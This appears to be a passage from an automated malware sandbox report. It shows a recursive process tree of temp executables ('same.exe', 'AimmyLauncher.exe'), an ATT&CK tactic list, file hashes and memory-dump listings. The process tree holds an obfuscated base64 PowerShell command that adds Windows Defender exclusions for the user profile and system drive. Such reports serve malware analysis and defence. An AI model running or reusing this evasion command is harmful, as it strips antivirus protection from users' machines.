"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
57⤵
PID:11184

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
57⤵
PID:11228

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
57⤵
PID:11236

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwB6ACMAPgA="
58⤵
PID:10588

C:\Users\Admin\AppData\Local\Temp\same.exe
"C:\Users\Admin\AppData\Local\Temp\same.exe"
58⤵
PID:10524

C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\AimmyLauncher.exe"
58⤵
PID:10660

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
45KB

MD5
61ff22a3b6c5334038c4491cc759606a

SHA1
1c20305ac5da2bd1156903489cf14c93ea7304e5

SHA256
d3d23e3d55998c3c5035367349f254dab76dd56fb856708472aa60016fa70863

SHA512
0832afdc16a616501c5ac28975ccfddd717a17baaf32a1923430808db91b774f74a3379e6d150f86d13dc4ee0e586b48d644b5205cf27f81e77a8481f8aaf8fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
45KB

MD5
ae3871008a70e39f3545ce21fb76856d

SHA1
c8537df2b89cd59b95fdb6bc88d6e4e66a33cdc8

SHA256
0cb4402448566b9c9edbb5def8f20f14ff1973941bd53cbd666967cae61c40de

SHA512
392bbb83459b804b38ff43ad6832aaacd9c26f2974631c1ee4c187596a42639217c539ceae5bb21289f644e20c69a22204a43e358161c6c9757b8a48f42416eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
45KB

MD5
ad0d7d35f2fd789415fc52368f2d34ea

SHA1
daabdf441a030a42f78027a2fa0536773afef739

SHA256
fe4f23874e3531bb6b2d51fb798154693636e0db13b2b2c81d217f283a27386f

SHA512
583c43575fb05efbc802605a192da6c32c0821d2dd01e29ed83ae9df94ff15312439302a00a37e3ffb451be693f7a88d356712811f2606c93fcec1673809212a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
45KB

MD5
1a55f7080c79ee3d931c728ebed39836

SHA1
96a0e86c9889d72fbd959da5e64245275a81684c

SHA256
903ab56f0d31d905177832b099831a1bed892e042136f72792d206c27caff989

SHA512
3483b0d0b1a0e702a66ca8ab3bf704cd29ec76eb4bd323cac0e461e3f021c6733939a9d20680a3260854297c8855380eefd9eb9f104e83e66adcf8c88d24eba1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
45KB

MD5
bef2fc66a450203b85980868224b8ee2

SHA1
9a53dd7bad45ad77d81a2b522890481e582778b7

SHA256
2a7ff588eb8eb409bee667482ae343a5f77bf29dd2bc9edce3c7c1abe20d5170

SHA512
28c2b018a67dc41270824ae28675254100b444f7ed4a89dd3583885069040282315fca2179771b1a0e263d4c830ea9233096c676cd9d79e9e10807d0cdef4c9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
45KB

MD5
9759d8f948a795f4dfc66a915972e0c4

SHA1
cba006863a4edaa8d48512cd7b272881aa635188

SHA256
dd1e29f00a25f58a89deb599ef067119920eaf307b71c1ff7b57d6438a14d3b3

SHA512
60582cc4cbd388e3451dd3a96b497c86a6118cdcecc298ca3ac8e8dbd6be6fee6d0e2bc7414d6e4fb1ec93e44314c7b5ae7643fd23e3941e708375d7d02b6c18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
45KB

MD5
f057b17caf5b9ed217888d623b684fab

SHA1
7b2bb7f23e20cad09f1b019ff9f0cc6933e0bd09

SHA256
82f2172796f2eff35b86cae6022231dd01b8f574299465899a690a0655ab974d

SHA512
056f97d24b68bf2ccc0e80d2d1ba621ff427c4098c8b7ac97667baf640dde1f4969cccba02552bf7792c9b948d708b81e6a60f97dff0ee9acdd218e03c1ec3df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
45KB

MD5
92eb3a5c0122339bdaa3516e8b92034f

SHA1
06219a40fe07d0db4c5777bec5b7df3df322f450

SHA256
a106f5fdde2d5cb4aca85c554c3bf271c603acd914f14a840913f3450b98bf07

SHA512
8ebbd612844600ea83647479293011aa3e08c4b8cee76a21d395ed148911e61493782a7c9d44a9c8891b4bba6b9526a8ac611c61756a62b9778599044e3b1d5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
44KB

MD5
101343244d619fd29dc007b34351865b

SHA1
a721bf0ee99f24b3e6c263033cfa02a63d4175cc

SHA256
286038573287d04ce980461054d2377b71ab4eb8a37e466b38d120ad7f93a043

SHA512
1a40055b9e2186d142059ab12afc82a21767f9fbfe98345be40f67619d128fb261f6afef74b25ba52b8f80480bb86e06006047de1b9505d5a65f7d7ee3ce0209

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4xl3czum.ykn.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\same.exe
Filesize
63KB

MD5
d08a4dcd46a2e38e0132117dc5bbb09f

SHA1
eda13ca17179b3652c9b9edc083d12ff5f590a23

SHA256
f1b3e06bfec1015f6611b27cd54372b7ae6930ade430ab9398827a7dabd8451a

SHA512
750a52b357931139f7717a1bbead1025af7ec77aaa769d9148ce1643647d0ad00ce3ba74e832aa588ba3f12fd5f44d689f9bad86f79bea5f74016ad994d82f88

Download Submit
memory/220-32-0x000000001AFE0000-0x000000001AFF0000-memory.dmp

Filesize
64KB

Download
memory/220-8-0x00007FF80AF10000-0x00007FF80B8FC000-memory.dmp

Filesize
9.9MB

Download
memory/220-58-0x00007FF80AF10000-0x00007FF80B8FC000-memory.dmp

Filesize
9.9MB

Download
memory/220-75-0x000000001AFE0000-0x000000001AFF0000-memory.dmp

Filesize
64KB

Download
memory/220-5-0x0000000000190000-0x00000000001A6000-memory.dmp

Filesize
88KB

Download
memory/516-63-0x00000000724D0000-0x0000000072BBE000-memory.dmp

Filesize
6.9MB

Download
memory/516-71-0x0000000008110000-0x000000000815B000-memory.dmp

Filesize
300KB

Download
memory/516-27-0x00000000072E0000-0x0000000007302000-memory.dmp

Filesize
136KB

Download
memory/516-35-0x0000000007A30000-0x0000000007A96000-memory.dmp

Filesize
408KB

Download
memory/516-60-0x0000000006D50000-0x0000000006D60000-memory.dmp

Filesize
64KB

Download
memory/516-79-0x00000000083F0000-0x0000000008466000-memory.dmp

Filesize
472KB

Download
memory/516-17-0x00000000724D0000-0x0000000072BBE000-memory.dmp

Filesize
6.9MB

Download
memory/516-13-0x0000000006D50000-0x0000000006D60000-memory.dmp

Filesize
64KB

Download
memory/516-12-0x0000000007390000-0x00000000079B8000-memory.dmp

Filesize
6.2MB

Download
memory/516-11-0x0000000006BF0000-0x0000000006C26000-memory.dmp

Filesize
216KB

Download
memory/516-18-0x0000000006D50000-0x0000000006D60000-memory.dmp

Filesize
64KB

Download
memory/592-43-0x000000001B010000-0x000000001B020000-memory.dmp

Filesize
64KB

Download
memory/592-74-0x00007FF80AF10000-0x00007FF80B8FC000-memory.dmp

Filesize
9.9MB

Download
memory/592-30-0x00007FF80AF10000-0x00007FF80B8FC000-memory.dmp

Filesize
9.9MB

Download
memory/788-28-0x00000000724D0000-0x0000000072BBE000-memory.dmp

Filesize
6.9MB

Download
memory/788-68-0x0000000007730000-0x000000000774C000-memory.dmp

Filesize
112KB

Download
memory/788-81-0x00000000724D0000-0x0000000072BBE000-memory.dmp

Filesize
6.9MB

Download
memory/788-38-0x0000000007960000-0x0000000007CB0000-memory.dmp

Filesize
3.3MB

Download
memory/788-24-0x0000000004930000-0x0000000004940000-memory.dmp

Filesize
64KB

Download
memory/788-69-0x0000000004930000-0x0000000004940000-memory.dmp

Filesize
64KB

Download
memory/788-33-0x00000000076A0000-0x0000000007706000-memory.dmp

Filesize
408KB

Download
memory/788-65-0x0000000004930000-0x0000000004940000-memory.dmp

Filesize
64KB

Download
memory/788-22-0x0000000004930000-0x0000000004940000-memory.dmp

Filesize
64KB

Download
memory/924-100-0x0000000007290000-0x00000000072A0000-memory.dmp

Filesize
64KB

Download
memory/924-80-0x0000000007290000-0x00000000072A0000-memory.dmp

Filesize
64KB

Download
memory/924-82-0x00000000724D0000-0x0000000072BBE000-memory.dmp

Filesize
6.9MB

Download
memory/1376-76-0x000000001B530000-0x000000001B540000-memory.dmp

Filesize
64KB

Download
memory/1376-57-0x00007FF80AF10000-0x00007FF80B8FC000-memory.dmp

Filesize
9.9MB

Download
memory/1812-50-0x00007FF80AF10000-0x00007FF80B8FC000-memory.dmp

Filesize
9.9MB

Download
memory/1852-110-0x00007FF80AF10000-0x00007FF80B8FC000-memory.dmp

Filesize
9.9MB

Download
memory/1852-40-0x00007FF80AF10000-0x00007FF80B8FC000-memory.dmp

Filesize
9.9MB

Download
memory/1852-46-0x000000001AD50000-0x000000001AD60000-memory.dmp

Filesize
64KB

Download
memory/2144-51-0x00000000066E0000-0x00000000066F0000-memory.dmp

Filesize
64KB

Download
memory/2144-49-0x00000000724D0000-0x0000000072BBE000-memory.dmp

Filesize
6.9MB

Download
memory/2144-52-0x00000000066E0000-0x00000000066F0000-memory.dmp

Filesize
64KB

Download
memory/2260-117-0x00000000724D0000-0x0000000072BBE000-memory.dmp

Filesize
6.9MB

Download
memory/2392-42-0x00000000069F0000-0x0000000006A00000-memory.dmp

Filesize
64KB

Download
memory/2392-44-0x00000000069F0000-0x0000000006A00000-memory.dmp

Filesize
64KB

Download
memory/2392-78-0x00000000724D0000-0x0000000072BBE000-memory.dmp

Filesize
6.9MB

Download
memory/2392-41-0x00000000724D0000-0x0000000072BBE000-memory.dmp

Filesize
6.9MB

Download
memory/3044-10-0x00007FF80AF10000-0x00007FF80B8FC000-memory.dmp

Filesize
9.9MB

Download
memory/3044-59-0x00007FF80AF10000-0x00007FF80B8FC000-memory.dmp

Filesize
9.9MB

Download
memory/3044-109-0x000000001B140000-0x000000001B150000-memory.dmp

Filesize
64KB

Download
memory/3044-39-0x000000001B140000-0x000000001B150000-memory.dmp

Filesize
64KB

Download
memory/3344-114-0x00007FF80AF10000-0x00007FF80B8FC000-memory.dmp

Filesize
9.9MB

Download
memory/3764-111-0x00007FF80AF10000-0x00007FF80B8FC000-memory.dmp

Filesize
9.9MB

Download
memory/4276-55-0x00000000724D0000-0x0000000072BBE000-memory.dmp

Filesize
6.9MB

Download
memory/4276-61-0x0000000006A30000-0x0000000006A40000-memory.dmp

Filesize
64KB

Download
memory/4276-62-0x0000000006A30000-0x0000000006A40000-memory.dmp

Filesize
64KB

Download
memory/4576-36-0x000000001B7C0000-0x000000001B7D0000-memory.dmp

Filesize
64KB

Download
memory/4576-64-0x00007FF80AF10000-0x00007FF80B8FC000-memory.dmp

Filesize
9.9MB

Download
memory/4576-99-0x000000001B7C0000-0x000000001B7D0000-memory.dmp

Filesize
64KB

Download
memory/4576-20-0x00007FF80AF10000-0x00007FF80B8FC000-memory.dmp

Filesize
9.9MB

Download
memory/4900-66-0x0000000000CB0000-0x0000000000CC0000-memory.dmp

Filesize
64KB

Download
memory/4900-67-0x00000000724D0000-0x0000000072BBE000-memory.dmp

Filesize
6.9MB

Download
memory/4900-29-0x00000000724D0000-0x0000000072BBE000-memory.dmp

Filesize
6.9MB

Download
memory/4900-26-0x0000000000CB0000-0x0000000000CC0000-memory.dmp

Filesize
64KB

Download
memory/4900-25-0x0000000000CB0000-0x0000000000CC0000-memory.dmp

Filesize
64KB

Download
memory/4900-72-0x0000000000CB0000-0x0000000000CC0000-memory.dmp

Filesize
64KB

Download